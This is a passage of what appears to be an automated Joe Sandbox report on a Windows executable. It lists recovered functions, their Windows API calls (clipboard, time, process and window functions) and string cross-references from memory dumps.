Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

CSV, xrefs: 0042485F
Parameter #3 invalid., xrefs: 0042850B
Parameter #2 invalid., xrefs: 004284E1
Read, xrefs: 004245E1

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048C39A, Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 217

Control-flow Graph

Executed
Not Executed

APIs

__Stoull.NTSTC_LIBCMT ref: 0048C54E
__Stoull.NTSTC_LIBCMT ref: 0048C578

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

__Stoull.NTSTC_LIBCMT ref: 0048C597
__Stoull.NTSTC_LIBCMT ref: 0048C5B6
__wsopen_s.LIBCMT ref: 0048C5FA

Strings

ccs, xrefs: 0048C549
UTF-8, xrefs: 0048C572
UTF-16LE, xrefs: 0048C591
UNICODE, xrefs: 0048C5B0

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426109, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 203time

APIs

Part of subcall function 0042E250: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E5BE
Part of subcall function 0042E250: CloseHandle.KERNEL32(?), ref: 0042E5D0
Part of subcall function 0042E250: CloseHandle.KERNEL32(?), ref: 0042E611
Part of subcall function 0042E250: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E62B
Part of subcall function 0042E250: SetCurrentDirectoryA.KERNEL32(?), ref: 0042E713
Part of subcall function 0042E250: GetFileAttributesA.KERNEL32 ref: 0042E775
Part of subcall function 0042E250: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0042E7A8
Part of subcall function 0042E250: ShellExecuteEx.SHELL32(0000003C), ref: 0042E7BE
Part of subcall function 0042E250: GetModuleHandleA.KERNEL32(kernel32.dll,GetProcessId), ref: 0042E7E2
Part of subcall function 0042E250: GetProcAddress.KERNEL32(00000000), ref: 0042E7E9
Part of subcall function 0042E250: GetLastError.KERNEL32 ref: 0042E829
Part of subcall function 0042E250: FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,000001FF,00000000), ref: 0042E862

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

ERROR, xrefs: 00426179
UseErrorLevel, xrefs: 0042610E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426068, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 177timewindow

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

SendMessageTimeoutA.USER32(0000FFFF,0000001A,00000000,Environment,00000001,00003A98,?), ref: 00426085

Strings

Environment, xrefs: 00426077

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004262A2, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 203time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00433630: __Stoull.NTSTC_LIBCMT ref: 00433718
Part of subcall function 00433630: GetWindowRect.USER32(?,?), ref: 00433875
Part of subcall function 00433630: EnumChildWindows.USER32(?,Function_0003A400,?), ref: 00433896
Part of subcall function 00433630: ScreenToClient.USER32(?,?), ref: 004338C6
Part of subcall function 00433630: GetWindowRect.USER32(00000000,?), ref: 004338F7
Part of subcall function 00433630: GetWindowThreadProcessId.USER32(?,00000000), ref: 00433A6E
Part of subcall function 00433630: AttachThreadInput.USER32(00000E10,?,00000001), ref: 00433AA8
Part of subcall function 00433630: SetActiveWindow.USER32(?), ref: 00433AC0
Part of subcall function 00433630: PostMessageA.USER32(?,00000201,00000001,?), ref: 00433B0F
Part of subcall function 00433630: PostMessageA.USER32(?,00000202,00000000,?), ref: 00433B41
Part of subcall function 00433630: PostMessageA.USER32(?,00000201,00000001,?), ref: 00433B6E
Part of subcall function 00433630: AttachThreadInput.USER32(00000E10,?,00000000), ref: 00433BA8

Strings

Parameter #4 invalid., xrefs: 004262CB

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426A6B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 200time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

Target label does not exist., xrefs: 00426AB6

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00428335, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175time

APIs

Part of subcall function 004145F0: __Stoull.NTSTC_LIBCMT ref: 00414670

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

Parameter #1 invalid., xrefs: 0042834D

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427EBA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

,iJ, xrefs: 00427EC0

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427E84, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

$iJ, xrefs: 00427E8A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042582D, Relevance: 12.3, APIs: 8, Instructions: 264time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

CharUpperA.USER32(004ABB26), ref: 0042594D

Part of subcall function 00412850: IsCharAlphaA.USER32(?), ref: 00412879
Part of subcall function 00412850: CharUpperA.USER32 ref: 00412887
Part of subcall function 00412850: CharLowerA.USER32 ref: 00412893

CharLowerA.USER32(004ABB26), ref: 00425937

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427671, Relevance: 12.2, APIs: 8, Instructions: 174time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

IsWindow.USER32(00000000), ref: 0042767B
DestroyWindow.USER32(00000000), ref: 0042768C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

